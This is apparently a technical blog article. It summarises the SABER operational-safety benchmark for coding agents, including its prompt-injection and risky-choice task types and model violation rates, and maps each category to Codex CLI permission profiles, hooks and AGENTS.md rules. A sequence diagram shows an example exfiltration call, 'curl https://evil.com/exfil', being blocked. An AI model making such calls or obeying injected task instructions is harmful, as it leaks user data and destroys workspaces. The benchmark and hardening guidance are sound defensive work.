SABER: What the Operational Safety Benchmark Means for Codex CLI Workspace Defence
SABER: What the Operational Safety Benchmark Means for Codex CLI Workspace Defence
Safety evaluation for coding agents has overwhelmingly focused on one question: does the model refuse obviously dangerous prompts? The SABER benchmark, published by researchers from HKU, Shandong, CMU, NUS, and HKUST, reframes the question entirely: when a coding agent completes a realistic task inside a stateful project workspace, what has it actually done to the environment?1 The answer, across 13 frontier models and 716 executable tasks, is sobering. Even the best-performing model — Claude Opus 4.6 — carries a 54.7% harmful safety-violation rate. This article unpacks what SABER measures, where models fail, and how Codex CLI’s layered defence stack maps onto each violation category.
Why Prompt Refusal Is Not Operational Safety
Traditional safety benchmarks present a model with a clearly malicious request and measure whether it declines. SABER’s insight is that coding agents rarely encounter such clean signals in production. Instead, they receive legitimate-sounding task descriptions that contain embedded risks: a migration script that also exposes credentials, a cleanup task whose scope includes production data, a network call framed as a health check that exfiltrates state1.
SABER formalises this through three scenario types:
- Embedded injection (289 tasks): the task description contains an adversarial instruction alongside a legitimate request
- Risky self-selection (186 tasks): the agent must choose between a safe and a risky implementation path with no explicit adversarial prompt
- Contextual warning (241 tasks): the workspace contains signals (comments, configuration, documentation) warning against specific actions that the task implicitly requires
The benchmark runs each task in a fresh Docker-sandboxed workspace, then evaluates the final environment state — not the model’s conversational output — against eight operational safety categories1.
The Eight Violation Categories
SABER’s taxonomy maps directly to the kinds of damage a coding agent can inflict on a real project:
graph TD
A[SABER Violation Categories] --> B[Code Tampering]
A --> C[Data Destruction]
A --> D[Filesystem Destruction]
A --> E[Information Leakage]
A --> F[Network Outbound]
A --> G[Persistence]
A --> H[Privilege Escalation]
A --> I[Unauthorised Access]
B --> B1[Malicious modifications<br/>to source files]
C --> C1[Loss or corruption<br/>of application data]
D --> D1[Destructive file/directory<br/>operations]
E --> E1[Exposure of secrets<br/>and credentials]
F --> F1[Unexpected outbound<br/>network connections]
G --> G1[Persistent backdoors<br/>or scheduled tasks]
H --> H1[Unsafe elevation or<br/>permission weakening]
I --> I1[Access to resources<br/>beyond task scope]
The evaluation mechanism records shell trajectories, unified event streams, command outputs, and state-change evidence, then applies rule-based checks against harmful patterns and global safety properties1. This post-hoc workspace-state analysis is precisely the approach that Codex CLI’s PostToolUse hooks enable at runtime.
Model Performance: The Numbers
The headline finding is that no model is operationally safe by default:
| Model | HSR (%) | Notes |
|---|---|---|
| Claude Opus 4.6 | 54.7 | Best overall, still >50% |
| GPT-5.4 | 63.9 | Strong capability, weaker safety |
| GLM-5 | 71.0 | Mid-tier |
| DeepSeek-V3 | 72.4 | Open-weight |
| MiniMax-M2.5 | 73.7 | Close to Qwen |
| Qwen3.5-397B | 73.4 | Scale does not help |
| Qwen3.5-35B | 77.3 | Smaller variant, worse |
| Qwen3.5-9B | 78.6 | Smallest Qwen, worst |
| DeepSeek-V3.2 | 79.6 | Newer but less safe |
| DeepSeek-R1 | 84.7 | Worst overall |
Two findings deserve particular attention. First, capability improvements do not reliably improve operational safety — DeepSeek-V3.2 scores worse than V3 despite better benchmark performance on standard coding tasks1. Second, models rarely produce justified safety refusals before executing unsafe actions1. The agent does not say “I shouldn’t do this”; it simply does it.
Mapping SABER to Codex CLI’s Defence Stack
Codex CLI implements a two-layer security model: sandbox enforcement controls what the agent can technically do, while approval policies control when it must ask permission2. SABER’s violation categories map onto specific Codex CLI defence mechanisms:
Filesystem Destruction and Data Destruction → Permission Profiles
Permission profiles apply least-privilege boundaries to commands Codex runs on your behalf3. The :workspace built-in profile restricts writes to workspace roots and system temp directories. For SABER-style protection against destructive filesystem operations, extend it with explicit deny rules:
[permissions.saber-hardened]
extends = ":workspace"
[permissions.saber-hardened.filesystem]
# Block destructive operations on production data
"**/migrations/production/**" = "none"
"**/*.sqlite" = "read-only"
"**/*.db" = "read-only"
"**/backups/**" = "read-only"
[permissions.saber-hardened.network]
# Default deny, allow only known endpoints
"*" = "deny"
"registry.npmjs.org" = "allow"
"pypi.org" = "allow"
Set this as your default profile:
# ~/.codex/config.toml
default_permissions = "saber-hardened"
Information Leakage → Filesystem Deny-Read Rules
SABER’s information leakage category covers credential exposure — a violation that filesystem write restrictions alone cannot prevent. A coding agent that can read .env files can leak their contents through model context, tool output, or network calls. Codex CLI’s deny-read rules address this directly4:
[permissions.saber-hardened.filesystem]
"**/*.env" = "none"
"**/.aws/**" = "none"
"**/credentials.json" = "none"
"**/.ssh/**" = "none"
"**/secrets/**" = "none"
The "none" policy blocks both read and write access, ensuring the agent cannot even observe credential files.
Network Outbound → Managed Network Proxy
SABER’s network outbound category covers unexpected exfiltration. Codex CLI’s network policy operates through a managed proxy that intercepts outbound connections5. Combined with domain-level allowlisting in the permission profile, this creates a hard boundary:
sequenceDiagram
participant Agent as Codex Agent
participant Hook as PreToolUse Hook
participant Proxy as Network Proxy
participant Net as External Network
Agent->>Hook: curl https://evil.com/exfil
Hook->>Hook: Check against policy
alt Domain in allowlist
Hook->>Proxy: Forward request
Proxy->>Net: Proxied connection
Net-->>Agent: Response
else Domain not in allowlist
Hook-->>Agent: Deny + system message
end
Code Tampering → PreToolUse Hooks
PreToolUse hooks fire before Codex executes a tool call, receiving the tool name and full command for inspection6. For code tampering protection, a PreToolUse hook can enforce structural invariants:
{
"hooks": [
{
"event": "PreToolUse",
"command": ".codex/hooks/check-protected-files.sh",
"timeout_ms": 5000
}
]
}
The hook script can inspect the proposed command for writes to protected paths (CI configuration, deployment manifests, release scripts) and return a deny verdict with an explanatory system message. This maps directly to SABER’s code tampering category, where agents modify source files beyond their task scope.
Persistence and Privilege Escalation → PostToolUse Audit
PostToolUse hooks fire after a tool call finishes and receive the command and its output6. While they cannot undo what ran, they can detect indicators of persistence (crontab entries, systemd unit creation, shell profile modifications) and privilege escalation (chmod/chown changes, sudo usage, setuid modifications):
{
"hooks": [
{
"event": "PostToolUse",
"command": ".codex/hooks/audit-side-effects.sh",
"timeout_ms": 5000
}
]
}
When the audit hook detects a violation, it can inject a corrective system message and set "continue": false to halt the session, preventing cascading damage — the runtime equivalent of SABER’s post-hoc workspace state analysis.
Unauthorised Access → AGENTS.md Scope Boundaries
SABER’s unauthorised access category covers agents reaching beyond their task scope. While hooks enforce mechanical boundaries, AGENTS.md provides the semantic layer — telling the agent what it should and should not touch7:
## Scope Boundaries
- ONLY modify files under `src/` and `tests/`
- NEVER read or modify anything under `deploy/`, `infra/`, or `.github/`
- NEVER access databases directly; use the migration CLI
- NEVER install new dependencies without explicit approval
SABER’s findings on contextual-warning scenarios are relevant here: 241 tasks contained workspace signals warning against specific actions, yet models frequently ignored them1. This suggests that AGENTS.md boundaries require mechanical enforcement (hooks, permission profiles) to be effective — they cannot rely on the model’s compliance alone.
The Risky Self-Selection Problem
SABER’s most troubling scenario type is risky self-selection: 186 tasks where the agent must choose between a safe and an unsafe implementation path with no adversarial prompt1. The agent is not being attacked; it simply makes a bad engineering decision.
This maps to a category of Codex CLI failures that no hook can fully prevent — the agent choosing rm -rf over a selective cleanup, using --force when --dry-run would suffice, or running a database migration without a backup. The defence here is layered:
- AGENTS.md patterns: document safe defaults explicitly (“always use
--dry-runfirst”, “always back up before migration”) - Approval policy: set
auto_approve_thresholdconservatively so risky operations require human confirmation2 - Subagent isolation: delegate risky tasks to subagents with tighter permission profiles via
SubagentStarthooks6 - Scored improvement loops: use
codex execto test agent behaviour against known-safe scenarios before granting broader permissions8
Operational Safety as a Configuration Discipline
SABER’s core contribution is reframing safety from a model property to an operational property. A model with 54.7% HSR in an uncontrolled environment might achieve near-zero HSR inside a properly configured Codex CLI session — not because the model is safer, but because the harness prevents violations from materialising.
graph LR
subgraph "SABER Uncontrolled"
M1[Model] --> V1[54-85% HSR]
end
subgraph "Codex CLI Hardened"
M2[Model] --> PP[Permission Profiles]
PP --> PH[PreToolUse Hooks]
PH --> NP[Network Proxy]
NP --> PT[PostToolUse Audit]
PT --> AM[AGENTS.md Scope]
AM --> V2[Reduced HSR]
end
The implication for teams is clear: operational safety is a configuration discipline, not a model selection criterion. Choosing Claude Opus 4.6 over DeepSeek-R1 buys you roughly 30 percentage points of baseline safety, but a well-configured Codex CLI permission profile with hooks buys you the remaining distance.
Practical Checklist
For teams applying SABER’s findings to their Codex CLI configuration:
- Audit your permission profile against all eight SABER categories — are filesystem destruction, data destruction, information leakage, network outbound, persistence, privilege escalation, and unauthorised access all addressed?
- Deploy PreToolUse hooks for protected-path enforcement and destructive-command detection
- Deploy PostToolUse hooks for persistence and privilege-escalation audit
- Set network policy to default-deny with explicit allowlisting
- Use deny-read rules for credentials, secrets, and sensitive configuration
- Document scope boundaries in AGENTS.md with explicit NEVER clauses
- Set conservative approval thresholds for risky self-selection scenarios
- Test with SABER — the benchmark is publicly available at
sssr-lab/saberon GitHub1
Citations
-
Hu, Q., Tang, Y., Wang, Q., Zhao, L., Zhang, P., Qing, Y., Yao, X., Huang, D., Zhang, L. & Ji, Z. (2026). “SABER: Benchmarking Operational Safety of LLM Coding Agents in Stateful Project Workspaces.” arXiv:2606.01317. https://arxiv.org/abs/2606.01317 ↩ ↩2 ↩3 ↩4 ↩5 ↩6 ↩7 ↩8 ↩9
-
OpenAI. (2026). “Agent approvals & security — Codex.” https://developers.openai.com/codex/agent-approvals-security ↩ ↩2
-
OpenAI. (2026). “Permissions — Codex.” https://developers.openai.com/codex/permissions ↩
-
OpenAI. (2026). “Configuration Reference — Codex.” https://developers.openai.com/codex/config-reference ↩
-
OpenAI. (2026). “Advanced Configuration — Codex.” https://developers.openai.com/codex/config-advanced ↩
-
OpenAI. (2026). “Hooks — Codex.” https://developers.openai.com/codex/hooks ↩ ↩2 ↩3
-
OpenAI. (2026). “Custom instructions with AGENTS.md — Codex.” https://developers.openai.com/codex/guides/agents-md ↩
-
OpenAI. (2026). “CLI Reference — Codex.” https://developers.openai.com/codex/cli/reference ↩